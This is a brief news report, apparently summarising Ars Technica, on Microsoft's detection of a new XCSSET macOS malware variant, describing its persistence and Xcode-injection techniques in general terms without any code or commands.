A new variant of XCSSET, a powerful and highly destructive macOS malware family, has been detected by Microsoft. The variant, which was first reported in 2020, marked the first publicly known update to the malware since 2022. Microsoft said it has observed limited attacks so far, but warned that the malware poses significant security risks.
The new XCSSET variant features improved persistence methods, allowing compromised devices to remain infected even after system reboots. It achieves this by creating a hidden file in the user’s shell configuration and replacing legitimate Launchpad app entries with fake ones.
Enhanced infection methods have also been introduced, including an option to choose when the malware triggers its payload, as well as a method that injects the payload into build settings on Xcode projects. The malware now uses more advanced obfuscation techniques, making it harder for security researchers to detect and analyze.
The detection of this new variant highlights the ongoing threat posed by macOS malware, particularly for developers who use Xcode tools. Microsoft’s warning underscores the need for users and developers to remain vigilant and implement robust security measures to protect themselves against such threats.
Source: https://arstechnica.com/security/2025/02/microsoft-warns-that-the-powerful-xcsset-macos-malware-is-back-with-new-tricks